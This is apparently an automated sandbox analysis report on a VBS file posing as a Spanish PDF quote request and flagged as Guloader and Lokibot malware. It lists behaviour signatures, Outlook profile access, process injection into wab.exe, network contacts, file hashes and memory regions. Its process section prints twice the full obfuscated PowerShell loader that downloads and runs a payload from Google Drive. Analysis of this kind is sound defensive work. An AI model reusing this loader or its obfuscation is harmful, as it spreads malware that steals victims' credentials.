Analysis Overview
SHA256
959ec9d9287432e3234cf35de1ad899ad4ae44d06e2bbf4fd0fe806b58ee6e21
Threat Level: Known bad
The file Solicitud de presupuesto Urgente 554PE·pdf.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
outlook_win_path
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-25 16:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-25 16:26
Reported
2024-03-25 16:28
Platform
win7-20240215-en
Max time kernel
141s
Max time network
139s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2752 set thread context of 3056 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt
| MD5 | cf56f5795de669e0ee0796627c7142f2 |
| SHA1 | 89a71383fe582e3ec82a024fd424cef08943daf9 |
| SHA256 | 858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf |
| SHA512 | c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30 |
memory/2308-265-0x000000001B850000-0x000000001BB32000-memory.dmp
memory/2308-267-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp
memory/2308-268-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2308-266-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2308-271-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2308-270-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2308-269-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp
memory/2308-272-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2308-273-0x0000000002990000-0x00000000029B2000-memory.dmp
memory/2308-274-0x00000000027A0000-0x00000000027B2000-memory.dmp
memory/2308-275-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp
memory/2308-276-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2308-277-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp
memory/2308-278-0x0000000002A10000-0x0000000002A90000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\13W2C00ZFSWHOREFU16J.temp
| MD5 | b9db5309c55375cba4808735274121b5 |
| SHA1 | 4086e67f71b96aa911e1271e985ec19984843e25 |
| SHA256 | 135d3db0c26fdaab48ef70fd73fe5728508d705267ee1b92305641a7dfb5c986 |
| SHA512 | a4551402534ed0dfdbe018a5d3a8cc16732243147e408205ede6c3452480f006ed0407517a0cb666a6d673cccbd91fe7b30bc5b5ddb548941c9dcfc26aae655e |
memory/2308-281-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2752-282-0x0000000073650000-0x0000000073BFB000-memory.dmp
memory/2752-284-0x0000000001E30000-0x0000000001E70000-memory.dmp
memory/2752-285-0x0000000001E30000-0x0000000001E70000-memory.dmp
memory/2752-283-0x0000000073650000-0x0000000073BFB000-memory.dmp
memory/2308-286-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2752-287-0x0000000001E30000-0x0000000001E70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab7EE0.tmp
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0e42bc5bdbf9ab895bb027528edc4139 |
| SHA1 | f59fcec40aaff2f623d5588c1d448982556cc0ee |
| SHA256 | 81c5a394565213f61de809e0dd1fd0972bfe0c36dc4c446ea986726bbf8e1fb1 |
| SHA512 | 71876b71b0bdfba832046c8f1f1ba43f3a35f951096d5d3e972f86e3696801ee3e23c1c86905f63aaedfc6309efd6c09693e0e65cfaae0102ad5439efacf980a |
memory/2752-299-0x0000000001E30000-0x0000000001E70000-memory.dmp
memory/2752-300-0x0000000006810000-0x000000000774D000-memory.dmp
memory/2752-301-0x0000000005830000-0x0000000005831000-memory.dmp
memory/2752-302-0x0000000006810000-0x000000000774D000-memory.dmp
memory/2752-304-0x0000000073650000-0x0000000073BFB000-memory.dmp
memory/2752-305-0x0000000077610000-0x00000000777B9000-memory.dmp
memory/2752-306-0x0000000001E30000-0x0000000001E70000-memory.dmp
memory/2752-307-0x0000000077800000-0x00000000778D6000-memory.dmp
memory/3056-308-0x0000000000920000-0x000000000185D000-memory.dmp
memory/3056-309-0x0000000077610000-0x00000000777B9000-memory.dmp
memory/2752-310-0x0000000006810000-0x000000000774D000-memory.dmp
memory/3056-311-0x0000000077800000-0x00000000778D6000-memory.dmp
memory/3056-312-0x0000000077836000-0x0000000077837000-memory.dmp
memory/3056-313-0x0000000000400000-0x0000000000581000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 17377c3f45ec353713f1d897171100af |
| SHA1 | f30b5fd3577754f5ce25d28982fee6283fb9e0c1 |
| SHA256 | 588353a715417a08f3eab42ee1a94afdeda0173661584c726e0347aaf82c5a73 |
| SHA512 | 6ba88b1f1168df5674e0226555ca5c9d645412602d18450d747778156016e6fb7043a09fb38e12cb2d820d662ca9cf1a50c3409f39b16d57eb775ccc7dc1825c |
C:\Users\Admin\AppData\Local\Temp\TarF46E.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/3056-335-0x0000000000920000-0x000000000185D000-memory.dmp
memory/3056-340-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-339-0x0000000000920000-0x000000000185D000-memory.dmp
memory/2752-342-0x0000000006810000-0x000000000774D000-memory.dmp
memory/3056-341-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-343-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-344-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-345-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2308-347-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp
memory/3056-346-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-349-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-348-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-350-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-351-0x0000000000400000-0x0000000000581000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/3056-374-0x0000000000400000-0x0000000000581000-memory.dmp
memory/3056-375-0x0000000000400000-0x0000000000581000-memory.dmp
